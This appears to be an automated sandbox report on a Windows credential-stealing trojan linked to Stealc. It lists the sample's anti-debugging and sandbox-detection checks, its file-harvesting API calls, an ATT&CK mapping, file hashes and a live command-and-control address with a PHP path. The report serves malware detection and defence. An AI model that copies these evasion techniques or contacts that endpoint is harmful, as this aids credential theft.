                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA051B second address: 4EA058B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF8A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop edx 0x0000000e call 00007EFD6CDBF8A6h 0x00000013 pop ecx 0x00000014 popad 0x00000015 jmp 00007EFD6CDBF89Bh 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d jmp 00007EFD6CDBF8A6h 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007EFD6CDBF8A7h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9EDC14 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9EDC58 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BBDCB9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-39131
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_007140F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0070E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00701710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00701710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007147C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_007147C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0070F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00714B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00714B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00713B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00713B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0070DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0070BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0070EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0070DF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00701160 GetSystemInfo,ExitProcess,0_2_00701160
                Source: file.exe, file.exe, 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2138292693.0000000001234000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2138292693.00000000011BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2138292693.0000000001202000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                Source: file.exe, 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37947
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37944
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37965
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37832
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37958
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37998
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00704610 VirtualProtect ?,00000004,00000100,000000000_2_00704610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00719BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00719BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00719AA0 mov eax, dword ptr fs:[00000030h]0_2_00719AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00717690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00717690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6396, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00719790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00719790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007198E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_007198E0
                Source: file.exe, file.exe, 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: _Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007475A8 cpuid 0_2_007475A8
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00717D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00717B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00717B10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007179E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_007179E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00717BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00717BC0

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.2.file.exe.700000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2097264497.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2138292693.00000000011BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6396, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0.2.file.exe.700000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2097264497.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2138292693.00000000011BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6396, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                11
                Process Injection
                1
                Masquerading
                OS Credential Dumping2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                2
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Native API
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                33
                Virtualization/Sandbox Evasion
                LSASS Memory641
                Security Software Discovery
                Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools
                Security Account Manager33
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection
                NTDS13
                Process Discovery
                Distributed Component Object ModelInput Capture12
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                Account Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information
                Cached Domain Credentials1
                System Owner/User Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing
                DCSync1
                File and Directory Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc Filesystem334
                System Information Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                bg.microsoft.map.fastly.net
                199.232.214.172
                truefalse
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  http://185.215.113.206/6c4adf523b719729.phptrue
                    unknown
                    http://185.215.113.206/true
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://185.215.113.206/6c4adf523b719729.php2file.exe, 00000000.00000002.2138292693.00000000011BE000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        http://185.215.113.206/6c4adf523b719729.php/file.exe, 00000000.00000002.2138292693.0000000001218000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://185.215.113.206file.exe, 00000000.00000002.2138292693.00000000011BE000.00000004.00000020.00020000.00000000.sdmptrue
                            unknown
                            http://185.215.113.206/wsfile.exe, 00000000.00000002.2138292693.0000000001218000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://185.215.113.206/6c4adf523b719729.phphc_file.exe, 00000000.00000002.2138292693.0000000001218000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                https://docs.rs/getrandom#nodejs-es-module-supportfile.exe, file.exe, 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2097264497.0000000004D5B000.00000004.00001000.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                185.215.113.206
                                unknownPortugal
                                206894WHOLESALECONNECTIONSNLtrue
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1544422
                                Start date and time:2024-10-29 12:03:09 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 3m 31s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:2
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 80%
                                • Number of executed functions: 20
                                • Number of non-executed functions: 129
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated
                                • Exclude process from analysis (whitelisted): dllhost.exe
                                • Excluded IPs from analysis (whitelisted): 4.245.163.56
                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                • VT rate limit hit for: file.exe
                                No simulations
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                185.215.113.206file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Quasar, StealcBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                bg.microsoft.map.fastly.netJo Smalley shared _Harbour Healthcare Ltd Project_ with you..emlGet hashmaliciousHTMLPhisherBrowse
                                • 199.232.214.172
                                Jo Smalley shared _Harbour Healthcare Ltd Project_ with you..emlGet hashmaliciousHTMLPhisherBrowse
                                • 199.232.214.172
                                https://www.google.mx/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=sf_rand_string_mixed(5)FgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Biw.%C2%ADgc%C2%ADrvn%C2%ADm0.%C2%ADza%C2%AD.c%E2%80%8Bo%C2%ADm%2Ffylee%2Fimages%2Fsf_rand_string_mixed(24)/toto@dgtresor.gouv.frGet hashmaliciousUnknownBrowse
                                • 199.232.210.172
                                Kvidistante.vbsGet hashmaliciousGuLoaderBrowse
                                • 199.232.210.172
                                https://pub-75eadb7757ac4bf2ab3de7c52d2a4895.r2.dev/index.html#'+tFjvjBPh,document%5B'body'%5D%5B'appendChild'%5D(para)Get hashmaliciousHTMLPhisherBrowse
                                • 199.232.210.172
                                https://clairecarpenter.com/wp-includes/css/pbcmc.php?7112797967704b536932307466507a4373757943784b5463314a54533470796b784f7a456e567130725553383750315338317430677031416341#Email#Get hashmaliciousHTMLPhisherBrowse
                                • 199.232.214.172
                                https://ws.onehub.com/files/3wbmh4dnGet hashmaliciousUnknownBrowse
                                • 199.232.210.172
                                uR1MVCwDco.exeGet hashmaliciousAsyncRATBrowse
                                • 199.232.214.172
                                http://prabal-gupta-lcatterton-com.athuselevadores.com.br/Get hashmaliciousHTMLPhisherBrowse
                                • 199.232.210.172
                                https://api.inspectrealestate.com.au/email/track?eta=1&t=B32-5UARLGTXC6GHXC7PJPHCGUP7HMF6FJEQ76L6MOL7WYB6P6EYQNBONANBBGKOXFRO3HPDET5TXGOZXG5FJNMJJC437YUYUWDF5VEVIWPK6LECEZJV3OMRCXF6VI76ZOGYOFIOERVACTHYB4KHK22IKKEWLYPTUBLONXLA7QVY2SW2TZMW4ULVG2UAKDR3DM3RL4TTJAF3F3ROXQ3ZLRVYS7Z2T4TIQETEEUV73V42AQLF65YKSUX6JMYEW3ZHXPREAMXXBOQV32GKOYOISFZKX4GPTPR2IMSMCULLR2V4QUSMU3MWF7NQ%3D%3D%3D%3DGet hashmaliciousUnknownBrowse
                                • 199.232.214.172
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousLummaCBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousLummaCBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousLummaCBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousLummaCBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousLummaCBrowse
                                • 185.215.113.16
                                No context
                                No context
                                No created / dropped files found
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.961505490272384
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:2'155'008 bytes
                                MD5:345e2a6577340e9722715c9a42736169
                                SHA1:48ebfe09a9482f6289a7db2523594bab4d600a08
                                SHA256:1b8052833a2230173369c09749f616b2bf4812983ed541d803f24afdfb01caa0
                                SHA512:a50768ccdb728d186b22cbf2980ce2ef167068d2a7092e9f0490498b31c73237a87399d2c7bc97ee3c88b821f61040c4d657648d912ddf22b79de0f0f0191bd0
                                SSDEEP:49152:GaFRDFSBDo/ljX/AFA03YPEYXhIYE4h8dvHW6gjkDW5XF0E:hg8jYeVEVYE4uAEi1
                                TLSH:ECA533320BA397A4FF7581B674E952D539AA7FE061D8013B87503219D32FF24B7AAC05
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...
                                Icon Hash:00928e8e8686b000
                                Entrypoint:0xb35000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                Instruction
                                jmp 00007EFD6D1EFC9Ah
                                xadd byte ptr [eax], ah
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add cl, ch
                                add byte ptr [eax], ah
                                add byte ptr [eax], al
                                add byte ptr [ebx], al
                                or al, byte ptr [eax]
                                add byte ptr [esi], al
                                or al, byte ptr [eax]
                                add byte ptr [ecx], al
                                or al, byte ptr [eax]
                                add byte ptr [edx], al
                                or al, byte ptr [eax]
                                add byte ptr [ebx], cl
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [ecx], al
                                add byte ptr [eax], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                push es
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], dl
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [ecx], al
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [ebx], al
                                or al, byte ptr [eax]
                                add byte ptr [esi], al
                                or al, byte ptr [eax]
                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x2e90500x64.idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e91f80x8.idata
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                0x10000x2e70000x6760084e8606ef291cd3a0140a312da7c7391unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc 0x2e80000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata 0x2e90000x10000x200049071433b9f7c843453337b0fd53002False0.1328125data0.8946074494647072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                0x2ea0000x2a60000x200a840fefc2c05f33ec940f05dd6a93c7bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
